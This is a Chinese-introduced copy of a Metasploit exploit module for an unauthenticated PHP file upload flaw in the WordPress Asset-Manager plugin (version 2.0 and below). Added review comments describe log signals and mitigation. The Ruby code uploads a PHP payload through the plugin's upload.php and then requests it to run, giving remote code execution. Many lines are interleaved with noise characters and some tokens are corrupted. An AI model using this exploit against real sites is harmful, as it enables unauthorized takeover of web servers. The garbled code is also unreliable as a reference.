这个 Metasploit 模块利用在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该漏洞允许上传 php 文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
+ O2 q! c; S; X$ U0 f
: ^! S0 n# _: P' ?##
% @0 b7 D3 J: [) Z) F/ |' F- k5 n# This file is part of the Metasploit Framework and may be subject to* J; ~7 k9 K1 B; ]" w
# redistribution and commercial restrictions. Please see the Metasploit
- y3 j+ y' i8 L: A0 I) S# Framework web site for more information on licensing and terms of use.1 S6 g2 @! N2 F, h1 J# y, a
# http://metasploit.com/framework/! z8 ~) E5 y5 g" y0 O5 f
##4 t7 p3 \, d2 I* F
$ F$ G9 b$ u& n3 p/ X; {% K
require 'msf/core'# O) `) s' Z& h- p$ P; X- W' _
require 'msf/core/exploit/php_exe'
* L9 _. M' `, F- Z
# Metasploit module for the unauthenticated file upload in the WordPress
# Asset-Manager plugin (<= 2.0); see the References list below for the
# public advisories it cites.
#
# NOTE(review): this listing was copied from a page that interleaves noise
# characters (e.g. `$ w9 g, G, q, ^$ a`) with the code, and some tokens are
# visibly corrupted (the second `include` line, the `2009` on the execution
# check). The text is kept byte-for-byte here and only comments were added;
# it does not look like it would parse as-is, so treat it as a reference
# copy, not a runnable file.
#
# Defensive reading of what the module does (from the request lines below):
# an unauthenticated multipart POST with a part named "Filedata" to
# wp-content/plugins/asset-manager/upload.php, followed by a GET of a .php
# file under wp-content/uploads/assets/temp/. That two-request sequence is
# the signal to look for in web server logs. Mitigation is to remove or
# update the plugin and to deny PHP execution beneath the uploads directory.
& r( I) x% p6 b4 W& G- ~3 |' Fclass Metasploit3 < Msf::Exploit::Remote
' G5 d4 Y7 G* q' Y# G: H3 g Rank = ExcellentRanking
" G/ E* w; ?9 b5 [+ A : U/ K8 l7 z% K2 p5 c; m3 ~7 B& U
include Msf::Exploit::Remote::HttpClient$ w9 g, G, q, ^$ a
# NOTE(review): this include is garbled in the copy ("Msf::Exploit: hpEXE");
# the `require 'msf/core/exploit/php_exe'` at the top of the file suggests the
# intended mixin is the PHP EXE helper that provides get_write_exec_payload
# used in #exploit -- confirm against the original module.
include Msf::Exploit: hpEXE
5 L7 `7 D7 j. \5 z% T# j ' R- M4 X+ k2 L3 ^! {0 x
# Registers the module metadata (name, description, authors, references,
# payload constraints, targets, disclosure date) and the TARGETURI option.
#
# @param info [Hash] module info merged via update_info (default: {})
def initialize(info = {})
# NOTE(review): the doubled comma after `info` is probably copy noise.
0 D3 i9 J2 ]: w super(update_info(info,, Q3 y* g% g( c, O- [
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',4 L" r# `3 A4 K" F7 @7 o) t! s
'Description' => %q{
1 S0 |' f0 n6 M9 n* P This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
$ L4 O, T. Z1 M3 R H1 t$ p9 w5 I plugin. By abusing the upload.php file, a malicious user can upload a file to a
6 m0 k6 O/ Q! [2 U( U4 u temp directory without authentication, which results in arbitrary code execution.9 T" ?/ L; i" B1 r% e
},
3 {/ B5 M# z2 y$ E 'Author' =>+ F! w7 a* J. O" A& f
[5 ]% G7 Z; [& W! C. M
'Sammy FORGIT', # initial discovery$ q1 l# ]/ O/ l) L6 d$ @
'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ D9 w& S, s5 ~. {
],2 E/ |$ g0 Z: A: Y( H+ a
'License' => MSF_LICENSE,% w3 ^& H% e w% ^
'References' =>- V8 Q' |5 w5 f( f4 s3 H* e
[
8 A. g, x7 e$ I. A- |8 ^3 w" L [ 'OSVDB', '82653' ],4 j: a3 C3 c, n, C& Y( O5 M3 s
[ 'BID', '53809' ],; V$ t: W2 i% S; K
[ 'EDB', '18993' ],
# NOTE(review): the URL below contains spaces in this copy; likely mangled.
2 |* B# ?7 V+ B w [ 'URL', 'http:// www.myhack58.com /' ]: r4 y3 a3 J* V8 L" R9 F5 d
],2 H* _6 e" u# j7 ^& u, }& |
'Payload' =>5 k' b9 w' R' n( n1 F4 Y9 A- E
{
# NUL is excluded from the payload bytes.
7 p' W* y5 G' z# e 'BadChars' => "\x00",% L0 ?; q: N2 [/ c' B H5 r
},
1 |1 A1 }4 H* F5 y2 @ 'Platform' => 'php',# x& ^ \+ m* ?0 L
'Arch' => ARCH_PHP,
* X9 A* @ I6 J- e8 E" e 'Targets' =>
6 B3 w7 _" K) d7 T [, T# g( m3 P0 c7 U
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],8 f! x S* T C B3 J+ ]: B! E
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
: ~: t- s |* M }/ {; J$ f6 l ],
# Target index 0 is the generic PHP payload.
* n4 l' h, `3 E, h% J 'DefaultTarget' => 0,
7 R! h5 u6 `; O5 P) q$ R' l+ Z: w9 U 'DisclosureDate' => 'May 26 2012'))
~- f/ ?) u" {5 Y
# TARGETURI is the WordPress base path; defaults to '/wordpress'.
9 ~9 H+ h3 e" ?: s- j register_options(
+ ^/ S& \8 j# Z1 @ [
5 m1 z3 V: n" D* s5 v) j4 D( I OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
2 v2 _1 t: W: K: C! F ], self.class)1 X5 w& z& H# s5 }; V7 a
end. j; m+ K8 Z5 A* U( y, [) ], ?2 s
" }+ P( ` D0 ^' Y0 }; g6 z
# Two HTTP requests: upload the generated PHP file via the plugin's
# upload.php, then request it from the plugin's temp upload directory.
# Raises via fail_with(Exploit::Failure::UnexpectedReply) when the upload
# response is missing, non-200, or does not echo the file name.
def exploit% d& {8 {" U- c( I0 F- e+ {
uri = target_uri.path
# Normalise TARGETURI to a trailing slash so the paths below concatenate.
! ~& b; M; [. { uri << '/' if uri[-1,1] != '/'
5 k6 R1 h, ]) H) h* u+ @- s peer = "#{rhost}:#{rport}"5 R/ K0 M, Z7 o
# Five random alphabetic characters plus ".php"; alphabetic only, so the
# unescaped regex interpolation in the upload check below is harmless.
payload_name = "#{rand_text_alpha(5)}.php"- y5 t4 u" ?2 [& _
# :unlink_self presumably makes the dropped file remove itself after it
# runs -- TODO confirm in the PhpEXE mixin; it is not visible here.
php_payload = get_write_exec_payload(:unlink_self=>true)7 z3 Q9 R9 K3 `2 Y
/ E* F% T: w; u/ C: B- H
# Multipart body with a single form-data part named "Filedata".
data = Rex::MIME::Message.new
, `2 b( T5 @7 g data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")/ k" ?5 e9 {; a' _9 C2 H5 t
# Strips the leading CRLF before the first boundary that Rex emits.
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' {! Q7 E4 O" a' Z
' p, K. ?$ A ] B o. ~8 N5 V" x
print_status("#{peer} - Uploading payload #{payload_name}")
- x4 m) Z' a. y6 Z: x2 X, I res = send_request_cgi({
8 {7 F! G/ e& r+ {* e' g 'method' => 'POST',+ A4 G$ K" M6 n2 G' g. e1 H
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
% e# G9 K, r# f; F6 i& t 'ctype' => "multipart/form-data; boundary=#{data.bound}",$ \* L) M# V' c7 {4 X
'data' => post_data
3 e4 V: f: w# b" i })- Q: {3 w1 `7 G0 \, ?4 r( b
# Upload is considered successful only when the server answers 200 and
# echoes the uploaded file name in the body.
& X! m$ ]5 Y# U if not res or res.code != 200 or res.body !~ /#{payload_name}/
! C2 E8 X' ]: K fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
2 @: L3 C' z3 Q* |: S+ b/ A7 ^$ p' Q' }end! B1 K! h1 Y% d! j& `2 p
; @& ? {' C, w: z$ U print_status("#{peer} - Executing payload #{payload_name}")
* L8 w7 @/ o9 t5 O1 F res = send_request_raw({ S% p% P; ~" N* M8 a# y8 T' M
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",1 B" n% E1 x* z9 ~- `. |* f' E
'method' => 'GET'
5 F5 I6 g0 t6 A V0 ?7 H })
* w Z$ y S3 l+ h5 I8 ` - `/ x1 ^# U' i. K# O
# Only a returned non-200 response is treated as failure; a nil response
# (no reply at all) falls through silently. The "2009" in this copy is most
# likely "200" with copy noise appended -- cannot confirm from this text.
if res and res.code != 2009 _7 |. m) W* d8 H: ]5 G' X
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
, K$ [ O0 O5 L9 q+ q+ `9 }; q p end) Y* z2 g6 A, i3 z7 k& ?% e
end
9 O- S2 D9 m3 _* `- h- }6 |4 l, Vend; c# c0 Y) v2 U2 X3 j! x% j
|